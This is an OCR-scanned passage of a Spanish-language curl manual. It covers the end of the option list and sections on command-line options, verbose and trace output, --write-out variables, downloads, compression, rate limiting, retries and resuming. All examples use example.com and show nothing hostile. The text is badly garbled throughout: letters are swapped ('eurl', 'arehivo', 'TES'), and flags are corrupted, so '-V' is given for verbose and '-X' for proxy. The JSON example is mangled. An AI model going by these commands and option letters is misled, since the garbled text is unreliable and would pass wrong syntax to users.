Hash MD5 aceptable de la clave pública del 
host 

—httpO.9 

Permitir respuestas HTTP 0.9 

-0, —httpl.O 

Usar HTTP 1.0 

—httpl.l 

Usar HTTP 1.1 

—http2 

Usar HTTP 2 

—http2-prior-knowledge 

Utilizar HTTP 2 sin actualización HTTP / 1.1 

—ignore-content-length 

Ignorar el tamaño del recurso remoto 

-i, —inelude 

Incluir encabezados de respuesta de protocolo 
en la salida 

-k, —insecure 

Permitir conexiones de servidor inseguras 
cuando se utiliza SSL 

—interface <name> 

Usar INTEREACE de red (o dirección) 

-4, —ipv4 

Resolver nombres a direcciones IPv4 

-6, —ipv6 

Resolver nombres a direcciones IPv6 

-j, —junk-session-cookies 

Ignorar las cookies de sesión leidas del 
archivo 

—keepalive-time <seconds> 

Tiempo de intervalo para sondas keepalive 




—key <key> 

Nombre de arehivo de elave privada 

—key-type <type> 

Tipo de archivo de clave privada (DER / PEM 
/ENG) 

—krb <level> 

Habilitar Kerberos con seguridad <level> 

—libcurl <file> 

Volcar el código equivalente de libcurl de esta 
línea de comando 

—limit-rate <speed> 

Eimita la velocidad de transferencia a RATE 

-1, —list-only 

Modo solo lista 

—local-port <num/range> 

Eorzar el uso de RANGE para números de 
puertos locales 

-L, —location 

Seguir redireccionamientos 

—location-trusted 

Al igual que —location, y envía autenticación 
a otros hosts 

—login-options <options> 

Opciones de inicio de sesión del servidor 

—mail-auth <address> 

Dirección del creador del correo electrónico 
original 

—mail-from <address> 

Correo desde esta dirección 

—mail-rcpt <address> 

Correo a esta dirección 

-M, —manual 

Muestra el manual completo 

—max-filesize <bytes> 

Tamaño máximo de archivo para descargar 

—max-redirs <num> 

Número máximo de redireccionamientos 
permitidos 

-m, —max-time <seconds> 

Tiempo máximo permitido para la 
transferencia 

—metalink 

Procesar las URLs dadas como archivo XME 
de metalink 

—negotiate 

Usar autenticación de negociación HTTP 
(SPNEGO) 

-n, —netrc 

Debe leer .netrc para nombre de usuario y 
contraseña 

—netrc-file <filename> 

Especifica EIEE para netrc 

—netrc-optional 

Utilizar .netrc o URL 

—next 

Hacer que la siguiente URL use su conjunto 
separado de opciones 

—no-alpn 

Deshabilita la extensión ALPN TES 

-N, —no-buffer 

Deshabilita el almacenamiento en búfer del 
flujo de salida 

—no-keepalive 

Deshabilita TCP keepalive en la conexión 

—no-npn 

Deshabilita la extensión NPN TES 

—no-sessionid 

Desactiva la reutilización de ID de sesión SSL 

—noproxy <no-proxy-list> 

Lista de hosts que no usan proxy 




—ntlm 

Usar autenticación HTTP NTLM 

—ntlm-wb 

Usar autenticación HTTP NTLM con winbind 

—oauth2-bearer <token> 

OAuth 2 Bearer Token 

- 0 , —output <file> 

Escribir en archivo en lugar de stdout 

—pass <phrase> 

Contraseña para la clave privada 

—path-as-is 

No aplastar ... secuencias en la ruta URL 

—pinnedpubkey <hashes> 

Clave pública FILE/HASHES para verificar 
puertos 

—postSOl 

No cambiar a GET después de seguir un 301 

—post302 

No cambiar a GET después de seguir un 302 

—post303 

No cambiar a GET después de seguir un 303 

—preproxy [protocol;//]host[;port] 

Usar primero este proxy 

-#, —progress-bar 

Mostrar el progreso de transferencia como una 
barra 

—proto <protocols> 

Habilitar / deshabilitar protocolos 

—proto-default <protocol> 

Usar este protocolo para cualquier URL que 
no tenga un esquema 

—proto-redir <protocols> 

Activa / desactiva los protocolos en la 
redirección 

-X, —proxy [protocol://]host[:port] 

Usar este proxy 

—proxy-anyauth 

Eliegir cualquier método de autenticación de 
proxy 

—proxy-basic 

Usar autenticación básica en el proxy 

—proxy-cacert <file> 

certificado CA para verificar el puerto del 
proxy 

—proxy-capath <dir> 

Directorio CApara verificar el puerto del 
proxy 

—proxy-cert <cert[;passwd]> 

Establecer certificado de cliente para proxy 

—proxy-cert-type <type> 

Tipo de certificado de cliente para proxy 
HTTPS 

—proxy-ciphers <list> 

Cifrados SSE para usar para proxy 

—proxy-crlfile <file> 

Establecer una lista CRL para proxy 

—proxy-digest 

Use la autenticación Digest en el proxy 

—proxy-header <header/@file> 

Pasar los encabezados personalizados al proxy 

—proxy-insecure 

Hacer conexiones proxy HTTPS sin verificar 
el proxy 

—proxy-key <key> 

Clave privada para proxy HTTPS 

—proxy-key-type <type> 

Tipo de archivo de clave privada para proxy 

—proxy-negotiate 

Usar la autenticación de negociación HTTP 
(SPNEGO) en el proxy 




—proxy-ntlm 

Usar la autenticación NTLM en el proxy 

—proxy-pass <phrase> 

Frase de paso para la clave privada para proxy 
HTTPS 

—proxy-pinnedpubkey <hashes> 

clave pública file/hashes para verificar con el 
proxy 

—proxy-service-name <name> 

Nombre del servicio proxy de SPNEGO 

—proxy-ssl-allow-beast 

Permitir falla de seguridad para 
interoperabilidad para proxy HTTPS 

—proxy-tlsl3-ciphers <ciphersuite list> 

conjuntos de cifrado proxy TLS 1.3 

—proxy-tlsauthtype <type> 

tipo de autenticación TLS para proxy HTTPS 

—proxy-tlspassword <string> 

contraseña TLS para proxy HTTPS 

—proxy-tlsuser <name> 

Nombre de usuario TLS para proxy HTTPS 

—proxy-tlsvl 

Usar TLS vi para proxy HTTPS 

-U, —proxy-user <user:password> 

Usuario y contraseña del proxy 

—proxyl.O <host[:port]> 

Usar proxy HTTP / 1.0 en el puerto dado 

-p, —proxytunnel 

Operar a través de un túnel proxy HTTP 
usando CONNLCT 

—pubkey <key> 

Nombre de archivo de clave pública SSH 

-Q, —quote 

Enviar comandos al servidor antes de 
transferir 

—random-file <file> 

Archivo desde el que leer datos aleatorios 

-r, —range <range> 

Recupera solo los bytes dentro del rango 

—raw 

Hacer HTTP "en bruto"; sin transferencia de 
decodificación 

-e, —referer <URL> 

URL de referencia 

-J, —remote-header-name 

Usa el nombre de archivo proporcionado por 
el encabezado 

-0, —remote-name 

Escribir salida en un archivo denominado 
como el archivo remoto 

—remote-name-all 

Utiliza el nombre de archivo remoto para 
todas las URL 

-R, —remote-time 

Establece la hora del archivo remoto en la 
salida local 

-X, —request <command> 

Especifica el comando de solicitud a usar 

—request-target 

Especifica el objetivo a esta solicitud 

—resolve <host:port:address[,address].. .> 

Resolver el host + puerto a esta dirección 

—retry <num> 

Número de veces a volver a intentar la 
solicitud si se producen problemas transitorios 

—retry-connrefused 

Reintento en conexión rechazada. Uso con 
—retry 

—retry-delay <seconds> 

Tiempo de espera entre reintentos 




—retry-max-time <seconds> 

Vuelva a intentarlo solo dentro de este período 

—sasl-ir 

Habilita la respuesta inicial en la autenticación 
SASL 

—service-name <name> 

Nombre del servicio SPNEGO 

-S, -show-error 

Muestra error incluso cuando se usa -s 

-s, —silent 

Modo silencioso 

—socks4 <host[;port]> 

proxy SOCKS4 en el host + puerto 
determinado 

—socks4a <host[;port]> 

proxy SOCKS4a en el host + puerto 
determinado 

—socks5 <host[;port]> 

proxy SOCKS5 en el host + puerto 
determinado 

—socks5-basic 

Habilitar autenticación de nombre de usuario / 
contraseña para servidores proxy SOCKS5 

—socks5-gssapi 

Habilita la autenticación GSS-API para 
servidores proxy SOCKS5 

—socks5 -gssapi-nec 

Compatibilidad con el servidor NEC SOCKS5 

—socks5-gssapi-service <name> 

Nombre del servicio proxy SOCKS5 para 
GSS-API 

—socks5-hostname <host[;port]> 

Nombre y puerto del proxy SOCK5 

-Y, —speed-limit <speed> 

Detiene las transferencias más lento que esto 

-y, —speed-time <seconds> 

Activar abortar por 'speed-limit' después de 
este tiempo 

—ssl 

Probar SSE/TES 

—ssl-allow-beast 

Permitir falla de seguridad para mejorar la 
interoperabilidad 

—ssl-no-revoke 

Desactivar las comprobaciones de revocación 
de certificados (Schannel) 

—ssl-reqd 

Requiere SSE/TES 

-2, —sslv2 

Usar SSEv2 

-3, —sslv3 

Usar SSEv3 

—stderr 

Donde redirigir stderr 

—styled-output 

Habilitar la salida con estilo para encabezados 
HTTP 

—suppress-connect-headers 

Suprimir los encabezados de respuesta de 
proxy CONNECT 

—tcp-fastopen 

Usar TCP East Open 

—tcp-nodelay 

Use la opción TCP NODEEAY 

-t, —telnet-option <opt=val> 

Establecer la opción telnet 

—tftp-blksize <value> 

Establecer la opción TETP BEKSIZE 

—tftp-no-options 

No envía ninguna opción TETP 




-z, —time-cond <time> 

Transferencia basada en una condición de 
tiempo 

-tls-max <VERSION> 

Establecer la versión máxima permitida de 

TES 

—tisis-ciphers <listofTLS 1.3 
ciphersuites> 

Conjuntos de cifrado TES 1.3 a usar 

—tlsauthtype <type> 

Establecer el tipo de autenticación TES 

—tlspassword 

Establecer la contraseña de TES 

—tlsuser <name> 

Establecer el nombre de usuario TES 

-1, —tlsvl 

Utilizar TLSvl.O o superior 

—tlsvl.O 

Utilizar TLSvl.O o superior 

—tlsvl. 1 

Utilizar TLSvl.l o superior 

—tlsvl.2 

Utilizar TLSvl.2 o superior 

—tlsvl.3 

Utilizar TLSvl.3 o superior 

—tr-encoding 

Solicitud de codificación de transferencia 
comprimida 

—trace <file> 

Escribe un seguimiento de depuración en el 
fichero file 

—trace-ascii <file> 

Como —trace, pero sin salida hexadecimal 

—trace-time 

Agregar marcas de tiempo para rastrear / 
salida detallada 

—unix-socket <path> 

Conéctese a través de este socket de dominio 
Unix 

-T, —upload-fde <file> 

Transferir el fichero local al destino 

—url <url> 

URL de trabajo 

-B, —use-ascii 

Usar transferencia de ASCII/texto 

-u, —user <user:password> 

Usuario y contraseña del servidor 

-A, —user-agent <name> 

Enviar el nombre del User-Agent al servidor 

-V, —verbose 

Hacer que la operación sea más comunicativa 

-V, —versión 

Muestra el número de versión y sale 

-w, —write-out <format> 

Usar este formato de salida después de la 
finalización 

—xattr 

Almacenar los metadatos en atributos de 
archivo extendidos 


37.1. Opciones de la línea de comandos 

Para decir a curl que haga algo, se invocas curl con cero, una o varias opciones de lineas de 
comando que acompañan a la URL o el conjunto de URLs sobre las que desea que se realice la 
transferencia, curl admite más de 200 opciones diferentes. 




Opciones cortas 

Las opciones de la línea de comando transmiten informaeión al curl para ver eomo quiere que se 
comporte. Para pedir a curl que active el modo detallado, usar la opción -v: 
curl -V http://example.com 

-V se usa aquí eomo una opeión corta. Se eseribes eon el símbolo menos y una sola letra 
inmediatamente después. 

Opciones largas 

Las opciones de una sola letra son convenientes ya que son rápidas de eseribir y usar, pero como 
hay solo un número limitado de letras en el alfabeto y hay muchas cosas que controlar, no todas 
las opciones están disponibles así. Por lo tanto se proporeionan nombres largos de opeiones para los 
demás. También eomo una eonvenieneia y para permitir que los seripts sean más legibles, la 
mayoría de las opeiones cortas también tienen nombre largo de alias. 

Las opciones largas siempre se escriben con 2 guiones y luego el nombre y solo se puede eseribir un 
nombre de opeión eon —. Así el modo detallado usando el formato de opeión larga se puede ejecutar 
como: 

curl —verbose http://example.com 

Argumentos a opciones 

No todas las opciones son simples indicadores booleanos que habilitan o deshabilitan funciones. 
Para algunos de ellos es necesario transmitir datos, como un nombre de usuario o una ruta a un 
archivo. Esto se hace eseribiendo primero la opción y luego el argumento, separados con un 
espacio. Como por ejemplo si se desea enviar una eadena de datos arbitrary en un HTTP POST a un 
servidor: 

curl -d arbitrary http://example.com 

Argumentos con espacios 

En ocasiones se desea pasar un argumento a una opeión y este argumento contiene uno o 
más espaeios. Por ejemplo, si se desea establecer el eampo user-agent que se usa exaetamente para 
ser tu padre incluidos estos 3 espacios, entonces se necesita poner comillas alrededor de la cadena 
cuando se pasas a curl en la línea de comando. Eas citas exactas a utilizar, dependen de su 
shell/símbolo del sistema, pero generalmente funeiona con comillas dobles en la mayoría de los 
lugares: 

curl -A "I am your father" http://example.com 
No usar comillas como si quisiera escribir la línea de comando de esta manera: 
eurl -A I am your father http://example.eom 

... hará que curl solo use ’T eomo una eadena de agente de usuario y las siguientes cadenas, 'am', 
your, etc. en su lugar, todos serán tratados como URE separadas ya que no comienzan con - para 
indicar que son opeiones y curl solo maneja opciones y URE. 

Para que la cadena eontenga comillas dobles, lo eual es común cuando por ejemplo, se desea enviar 
una cadena de JSON al servidor, es posible que necesite usar comillas simples excepto en Windows, 
donde las comillas simples no funcionan de la misma manera. Para enviar la cadena 
JSON {"nombre": "Darth"}, ejeeutar 

eurl -d ' ("ñame":"Darth"}' http://example.eom 

O si se desea evitar la comilla simple, se puede preferir enviar los datos a curl a través de un 
archivo, que luego no necesita el presupuesto adieional. Suponiendo que llamamos al archivo 'json' 
que contiene los datos meneionados anteriormente: 
curl -d @j son http://example.com 



37.2. 


Modo verbose 


Si el comando curl no se ejecuta o no devuelve lo que esperaba, su primera reacción siempre debe 
ser ejecutar el comando con la opción verbose -v/—verbose para obtener más información. 

Cuando el modo verbose está habilitado, curl se vuelve más hablador y explicará y mostrará mucho 
más de sus acciones. Agregará pruebas informativas y las prefijará con Por ejemplo, veamos 
que podría decir curl cuando intenta con un ejemplo HTTP simple guardar los datos descargados en 
el archivo llamado ’saved': 

$ curl -V http //example.com -o saved 
* Rebuilt URL to: http: //example. com/ 

Si se usa un HTTPS: //URL en lugar de un HTTP, también habrá un montón de lineas que explican 
como curl usa los certificados CA para verificar el certificado del servidor y algunos detalles del 
certificado del servidor, etc. incluyendo que cifrados fueron seleccionados y más detalles de TLS. 
Además de la información adicional que proporciona curl, el modo verbose -v también hace que 
curl muestre todos los encabezados que envia y recibe. Para los protocolos sin encabezados como 
FTP, SMTP, POP3, etc., podemos considerar comandos y respuestas como encabezados y por lo 
tanto, también se mostrarán con -v. 

Opción —trace and —trace-ascii 

Hay momentos en que -v no es suficiente. En particular cuando se desea almacenar el flujo 
completo incluyendo los datos transferidos reales. 

Para esto, curl ofrece 2 opciones que se pueden usar en vez de -v, —trace [filename] ahorrará un 
seguimiento completo en el nombre de un fichero determinado. También se puede usar en vez de 
un nombre de fichero para pasarlo como stdout. Se podría usar esto: 

$ curl —trace dump http://example.com 
Cuando se completa, hay un fichero 'dump' que puede tener un buen tamaño. 

Opción —trace-time 

Esta opción prefija todas las salidas verbose/trace con un temporizador de alta resolución para 
cuando la linea está impresa. Eunciona con la opción regular -v / —verbose, asi como con —trace y 
—trace-ascii. 

Eas lineas son todas las horas locales como horas: minutos: segundos y luego número de 
microsegundos en este segundo 

Opción —write-out 

Esta es una de las pequeñas gemas a menudo olvidadas en el arsenal de opciones de linea de 
comando —write-out o simplemente -w para abreviar. Escribe la información después de que se 
haya completado una transferencia y tiene una gran variedad de variables que puede incluir en la 
salida, variables que han sido establecidas con valores e información de la transferencia. 

Ee dice a curl que escriba una cadena simplemente pasando esta cadena con esta opción: 

curl -w "formatted string" http://example.com/ 

... y también se puede hacer que curl lea esta cadena de un archivo dado con '@': 
curl -w @filename http://example.com/ 

...o incluso hacer que curl lea la cadena de stdin si se usa'-' como nombre de archivo: 
curl -w @- http://example.com/ 

Se accede a las variables disponibles escribiendo %{variable_name} en la cadena y esta variable 
será sustituida por el valor correcto. Para generar un '%' normal, simplemente escribirlo como '%%'. 
También se puede generar una nueva linea utilizando '\ n', un retorno de carro con '\ r' y un espacio 
de tabulación con '\ f. 

Como ejemplo, podemos generar el Contení-Type y el código de respuesta desde una transferencia 
HTTP separada con nuevas lineas y texto adicional como éste: 



curl -w "Type: %{content_type}\nCode: %{response_code}\n" http;//example.com 

Variables disponibles de —write-out 

Algunas de estas variables no están disponibles en versiones eurl realmente antiguas. 

%{eontent_type} muestra el Contení-Type del doeumento solieitado si lo hubiere. 

%{filename_eíTeetive} muestra el último nombre de arehivo en el que eurl eseribe. Esto es sólo 
significativo si se le dice a curl que escriba en un archivo con la opción - - remóte- ñame o — output. 
Es muy útil en combinación con la opción - - remóte- header- ñame 

%{ftp_entry_path} muestra la ruta inicial que curl termina al iniciar sesión en el servidor remoto 
ETP. 

%{response_code} muestra el código de respuesta numérico que se encontró en la última 
transferencia. 

%{http_connect} muestra el código numérico que se encontró en la última respuesta de un 
proxy a una solicitud CONNECT de curl. 

%{local_ip} muestra la dirección IP del extremo local de la conexión realizada más recientement. 
Puede ser IPv4 o IPv6 

%{local_port} muestra el número de puerto local de la conexión realizada más recientemente 

%{num_connects} muestra el número de nuevas conexiones realizadas en la transferencia reciente. 

%{num_redirects} muestra el número de redireccionamientos que se siguieron en la solicitud. 

%{redirect_url} muestra la URL real a la que lo redireccionaría cuando una solicitud HTTP se 
realizó sin - L para seguir los redireccionamientos. 

%{remote_ip} muestra la dirección IP remota de la conexión realizada más recientemente. Puede 
ser IPv4 o IPv6. 

%{remote_port} muestra el número de puerto remoto de la conexión realizada más recientemente. 

%{size_download} muestra el número total de octetos que se descargaron. 

%{size_header} muestra el número total de octetos de los encabezados descargados. 

%{size_request} muestra el número total de octetos que se enviaron en la solicitud HTTP. 

%{size_upload} muestra el número total de octetos que se subieron. 

%{speed_download} muestra la velocidad de descarga promedio que mide curl para la 
descarga completa en octetos por segundo. 

%{speed_upload} muestra la velocidad de subida promedio que mide curl para completar 
la subida en octetos por segundo. 


%{ssl_verify_result} muestra el resultado de la verificación del certificado de peer SSL que fue 



solicitado. 0 significa que la verificación fue exitosa. 

%{time_appoonneot} muestra el tiempo, en segundos, que tomó desde el inicio hasta que se 
completó el SSL/SSH/ete conneet/handshake al dispositivo remoto. 

%{time_connect} muestra el tiempo, en segundos, que tomó desde el inieio hasta que se completó 
la conexión TCP al dispositivo remoto o proxy. 

%{time_namelookup} muestra el tiempo, en segundos, que tardó desde el principio hasta que se 
completó la resolueión del nombre. 

%{time_pretransfer} muestra el tiempo, en segundos, que tomó desde el inicio hasta que la 
transferencia de archivo estaba a punto de eomenzar. Esto incluye todos los comandos previos a la 
transfereneia y las negociaeiones que son espeeíficas de los protocolos particulares involuerados. 

%{time_redirect} muestra el tiempo, en segundos, que tomó para todos los pasos de redirección, 
incluidos la búsqueda de nombre, la conexión, la pretransferencia y la transferencia antes de que se 
inicie la transacción final, time redirect muestra el tiempo de ejecución completo para múltiples 
redireeeiones. 

%{time_starttransfer} muestra el tiempo, en segundos, que transcurrió desde el inicio hasta que es 
transferido el primer oeteto. Esto ineluye time_pretransfer y también el tiempo que el servidor 
neeesitó para ealcular el resultado. 

%{time_total} muestra el tiempo total, en segundos, que duró la operaeión eompleta. El tiempo 
se mostrará con una resolución de milisegubdos. 

%{url_effective} muestra la TÍRE que se obtuvo por última vez. Esto es partíeularmente 
significativo si se le ha dieho a curl que siga Eocation: headers (eon - E). 

Silencio 

Eo opuesto a verboso es hacer que curl sea más silencioso. Con la opción -s o -silent, se haee que 
el eurl apague el medidor de progreso y no muestre ningún mensaje de error para cuando ocurren 
errores. Se pone mudo. Sin embargo emitirá los datos deseargados que se le solieite. 

Con el sileneio aetivado, se puede solicitar que aún envíe el mensaje de error si hay fallos 
agregando -S o -show-error. 

37.3. Descargas 

Descargar significa obtener datos de un servidor en una red, y el servidor está claramente 
considerado estar por eneima de ti. Esto está eargando datos desde el servidor a su máquina donde 
estas corriendo curl. Ea descarga es probablemente el caso de uso más común para curl; obtener los 
datos específieos en su máquina, señalada por una URL 

eurl por defecto descarga una URL o varias si así se espeeifica. Por ejemplo, ejecuyar lo siguiente 
para la URL http://example.eom; 
curl http://example.com 

Una solicitud de un recurso es específica del protocolo, por lo que un ETP://URL funciona de 
manera diferente que un HTTP:// URL o un SETP:// URL. 


Si se espeeifica varias URLs en la línea de comando, curl descargará cada URL, una por una. No 



comenzará la segunda transfereneia hasta que se eomplete la primera, ete. 


Almacenando descargas 

Si se prueba la desearga example.eom anterior, se notará que curl envía los datos deseargados a 
stdout a menos que se le indique que haga otra cosa. La salida de datos a stdout es realmente útil 
cuando se quiere eanalizar a otro programa o similar, pero no siempre es la la forma óptima de 
manejar las deseargas. 

Se puede dar a eurl un nombre de arehivo para guardar la desearga eon la opeión -o [nombre de 
arehivo] o eon —output eomo la versión larga de la opeión, donde el nombre de archivo es solo un 
nombre de archivo, una ruta relativa a un nombre de archivo o una ruta completa al arehivo. 

Conseguir el nombre del fichero objetivo desde el servidor 

Los servidores HTTP tienen la opeión de proporcionar un encabezado llamado Content-Disposition: 
en las respuestas. Este encabezado puede eontener un nombre de arehivo sugerido por los 
eontenidos entregados y se le puede deeir a eurl que use esta pista para nombrar su arehivo loeal. El 
-J / — nombre del eneabezado remoto, permite esto. Si también usa la opeión -O, haee que eurl use 
el nombre del archivo de la URL predeterminado y solo si realmente hay un eneabezado disponible 
Content-Disposition, eambia a guardar usando este nombre. 

-J tiene algunos problemas y riesgos asoeiados que los usuarios deben tener en euenta: 

1. Solo usará la parte más a la dereeha del nombre de arehivo sugerido, por lo que eualquier 
ruta o direetorio el servidor sugiere que se eliminarán. 

2. Dado que el servidor seleeeiona eompletamente el nombre del arehivo, eurl sobreseribirá 
eualquier arehivo loeal preexistente en su direetorio aetual si el servidor proporeiona dieho 
nombre de archivo. 

3. Problemas de eodificación de nombre de archivo y juegos de caraeteres. curl no decodifica 
el nombre en ninguna manera, por lo que puede terminar eon un nombre de archivo 
codificado en URL donde un navegador de lo eontrario, deseifrarlo en algo más legible 
utilizando un eonjunto de caraeteres sensible. 

HTML y el conjunto de caracteres 

curl descargará los datos binarios exactos que envía el servidor. Esto puede ser importante 
en el caso de que, por ejemplo, descargue una página HTME u otros datos de texto que usen una 
determinada codificación de caracteres que el navegador muestra como se esperaba. Entonces curl 
no traduce los datos que llegan. 

Un ejemplo donde esto causa algunos resultados sorprendentes es cuando un usuario descarga una 
página web con algo como: 

curl https://example.com/ -o storage.html 

... y al inspeccionar storage.html después del hecho, el usuario se da cuenta de que uno o más 
caracteres se ven graciosos o totalmente equivocados. Esto puede ser muy bien porque el el servidor 
envió los caracteres usando el juego de caracteres X, mientras que su editor y entorno usan el juego 
de caracteres Y. En un mundo ideal, todos usaríamos UTE-8 en todas partes, pero 
desafortunadamente, este aún no es el caso. 

Compresión 

curl permite solicitar a los servidores HTTP y HTTPS que proporcionen versiones comprimidas de 
los datos y luego realiza la descompresión automática al llegar. En situaciones donde el ancho de 
banda es más limitado que la CPU, esto ayudará a recibir más datos en menos tiempo. 

Ea compresión HTTP se puede hacer usando 2 mecanismos diferentes, uno que podría ser 
considerado la forma correcta y la otra que es la forma en que todo el mundo realmente usa y es 
la forma generalizada y popular de hacerlo. Ea forma común de comprimir contenido HTTP es 
utilizando el encabezado Content-Encoding. Se pide a curl que use esto con la opción —compressed: 



curl —compressed http://example.com/ 


Con esta opción habilitada y si el servidor lo admite, entrega los datos en un formato comprimido y 
curl lo descomprimirá antes de guardarlo o enviarlo a stdout. Esto generalmente significa que como 
usuario realmente no ve o experimenta la compresión de otra manera que no sea posible mas que 
notando una transferencia más rápida. 

La opción —compressed solicita la compresión de codificación de contenido utilizando uno de los 
algoritmos de compresión compatibles. También está el método Transfer-Encoding más raro, que es 
que el encabezado que se creó para este método automatizado pero que nunca fue realmente 
ampliamente adoptado. Se puede indicar a curl que solicite la compresión Transfer-Encoded con la 
opción —tr: 

curl -tr -encoding http://example.com/ 

En teoria no hay nada que impida usar ambas opciones en la misma linea de comando, aunque en la 
práctica, puede experimentar que algunos servidores se confundan un poco cuando pida comprimir 
de 2 maneras diferentes. En general, es más seguro elegir uno. 

Redirección tipo shell 

Cuando se invoca curl desde un shell o algún otro sistema de linea de comandos, generalmente el 
entorno proporciona un conjunto de capacidades de redirección de salida. En la mayoría de los 
shells de Linux y de Unix y con las indicaciones de comando de Windows, se dirige el stdout a un 
archivo con > nombre del archivo. Usar esto hace que el uso de -o u -O sea superfluo. 
curl http://example.com/ > example.html 

Redirigir la salida a un archivo, redirige toda la salida de curl a este archivo, por lo que incluso si 
solicita transferir más de una URL a stdout, redirigiendo la salida obtendrá la salida de todas las 
URL almacenado en este único archivo. 

curl http://example.eom/l http://example.eom/2 > files 

Los shells de Unix generalmente permiten redirigir la secuencia stderr por separado. La secuencia 
stderr es generalmente una secuencia que también se muestra en el terminal, pero se puede redirigir 
por separado del flujo stdout. La secuencia stdout es para los datos, mientras que stderr son los 
metadatos y los errores, etc. Eso no son datos. Se puede redirigir stderr de la forma siguiente: 
curl http://example.com > files.html 2>errors 

Múltiples descargas 

Debido a que se puede decir a curl que descargue muchas URL en una sola linea de comando, a 
veces se desee almacenar estas descargas en archivos locales separados. 

La clave para entender esto es que cada URL descargada necesita su propia instrucción de 
almacenamiento. Sin dicha instrucción de almacenamiento, curl enviará los datos a stdout de forma 
predeterminada. Si solicita 2 URL y solo le dice a curl donde guardar la primera URL, se envia la 
segunda a stdout, de la forma siguiente: 

curl -o one.html http://example.eom/l http://example.eom/2 

Las instrucciones de almacenamiento se leen y manejan en el mismo orden que se descargan las 
URLs, no tienen que estar al lado de la URL de ninguna manera. Se puedes redondear todas las 
opciones de salida primero, último o intercalado con las URL. 

Todos estos ejemplos fúncionan de la misma manera: 

curl -o l.txt -o 2.txt http://example.eom/l http://example.eom/2 
curl http://example.eom/l http://example.eom/2 -o l.txt - o 2.txt 
curl -o l.txt http://example.eom/l http://example.eom/2 -o 2.txt 
curl -o l.txt http://example.eom/l -o 2.txt http://example.eom/2 



El - o es igualmente solo una instrueeión para una sola desearga, por lo que si descarga múltiples 
URL, se deben especificar varias veces: 

curl -O -O littp://example.com/1 http://example.eom/2 

Limitando la velocidad 

Para la mayoría de los casos, usar el mayor ancho de banda posible es algo bueno. Hace que la 
transferencia sea más rápido, hace que el comando curl se complete antes y hará que la 
transferencia use recursos del servidor por un período de tiempo más corto. 

Sin embargo a veces se descubrirá que curl elimina otras funciones de red en la conexión de red 
local, lo cual es un inconveniente. En estas situaciones, es posible que se desee decirle a curl que 
disminuya la velocidad para que otros usuarios de la red tengan una mejor oportunidad de obtener 
sus datos. Con —limit-rate [velocidad] se puede decir a curl que no vaya más rápido que el número 
dado de octetos por segundo. El valor del límite de velocidad se puede dar con un sufijo de letra 
usando uno de K, M y G para kilobytes, megabytes y gigabytes. 

Para hacer que curl no descargue datos más rápido que 200 kilobytes por segundo, ejecutar lo 
siguiente: 

curl https: //example. com/ - - limit- rate 200K 

Tamaño máximo del fichero 

Cuando desee asegurarse de que la línea de comando de curl no intenta descargar un archivo 
demasiado grande, puede indicarle a curl que se detenga antes de hacerlo, si conoce el tamaño antes 
de que comience la transferencia. Tal vez eso usaría demasiado ancho de banda, tomaría demasiado 
tiempo o no tendría suficiente espacio en el disco duro: 

curl —max-filesize 100000 https://example.com/ 

Se puede especificar la descarga más grande que aceptará en número de octetos y si curl puede 
descubrir el tamaño antes de que comience la transferencia se cancelará antes de intentar descargar 
algo más grande. 

Hay muchas situaciones en las que curl no puede calcular el tamaño en el momento de que empieze 
la transferencia y esta opción no afectará a estas transferencias, incluso si pueden ser más grandes 
que la cantidad especificada 

Almacenando metadatos en el sistema de ficheros 

Al guardar una descarga de un archivo con curl, la opción —xattr le dice a curl que también 
almacene determinados metadatos de archivo en "extended file attributes". Estos atributos 
extendidos son básicamente pares nombre/valor estandarizados almacenados en el sistema de 
archivos, asumiendo uno de los archivos admitidos y sistemas operativos utilizados. 

Actualmente la URL está almacenada en el atributo xdg.origin.url y para HTTP, el tipo de contenido 
se almacena en el atributo mime type. Si el sistema de archivos no admite atributos extendidos 
cuando se establece esta opción, se emite una advertencia. 

Opción —raw 

Cuando se usa la opción —raw, se deshabilita toda la decodificación interna del contenido o las 
codificaciones de transferencia y en su lugar, hace que el curl pase sin modificar ni procesar los 
datos. 

Esto se usa generalmente si se está escribiendo algún tipo de software intermedio y se desea 
transmitir quizás el contenido a otro cliente HTTP y permitir que haga la decodificación en su lugar. 

Reíntentando intentos fallidos 

Normalmente curl solo intentará realizar una transferencia y devolverá un error si no tiene éxito. 
Usando la opción —retry puede decirle a curl que vuelva a intentar determinadas transferencias 
fallidas. 

Si curl devuelve un error transitorio cuando intenta realizar una transferencia, volverá a intentar el 



número de veees espeeifieado antes de rendirse. Estableeer el número en 0 haee que eurl no vuelva 
a intentarlo y es lo que sueede por defeeto. El error transitorio signifiea: un tiempo de espera, un 
eódigo de respuesta ETP 4xx o un HTTP 5xx eódigo de respuesta. 

Cuando eurl está a punto de volver a intentar una transfereneia, primero esperará un segundo y 
luego todos los siguientes volverá a intentarlo duplieando el tiempo de espera hasta que llegue a 10 
minutos, que luego será el retraso entre el resto de los reintentos. Usando —retry-delay se puede 
deshabilitar este algoritmo exponeneial de reintento y estableeer su propio retraso entre los intentos. 
Con —retry-max-time se espeeifiea el tiempo total permitido para los reintentos. Ea opeión 
—max-time espeeifieará el tiempo más largo que se permite gastar en una sola de estas 
transfereneias. 

Reanudando y rangos 

Reanudar una desearga signifiea primero verifiear el tamaño de lo que ya está presente loealmente y 
luego pedir al servidor que envie el resto para que pueda agregarse, eurl también permite reanudar 
la transfereneia en un punto personalizado sin tener realmente nada presente loealmente. 
eurl soporta deseargas reanudadas en varios protoeolos. Se trata de deeir a eurl donde eomenzar la 
transfereneia eon la opeión -C, —eontinue-at que toma un desplazamiento del eontador de oetetos 
numérieo simple donde eomenzar o la eadena: eso le pide a eurl que lo deseubra en funeión de lo 
que sabe. Cuando se usa -, eurl usará el nombre del arehivo de destino para determinar euantos 
datos ya están presentes loealmente y solieitar usar esto eomo una eompensaeión euando solieite 
más datos del servidor. 

Para inieiar una desearga de un fiehero ETP desde la posieión 100; 

eurl —eontinue-at 100 ftp://example.eom/bigfile 
Continuar deseargando una desearga interrumpida previamente; 

eurl —eontinue-at - http://example.eom/bigfile -O 
En eambio si solo desea transferir un rango de oetetos espeeifieo del reeurso remoto, se puede 
pedir solo esto. Por ejemplo euando solo se desean 1000 oetetos a partir de la posieión 100 para 
evitar tener que deseargar todo el arehivo remoto enorme, se puede ejeeutar: 
eurl —range 100-1999 http://example.eom/bigfile 

37.4. Subida de ficheros 

Subir es un término que signifiea enviar datos a un servidor remoto. Ea subida se realiza de manera 
diferente para eada protoeolo y varios protoeolos pueden ineluso permitir diferentes formas de subir 
datos. Se pueden subir datos utilizando uno de estos protoeolos: EILE, ETP, ETPS, HTTP, HTTPS, 
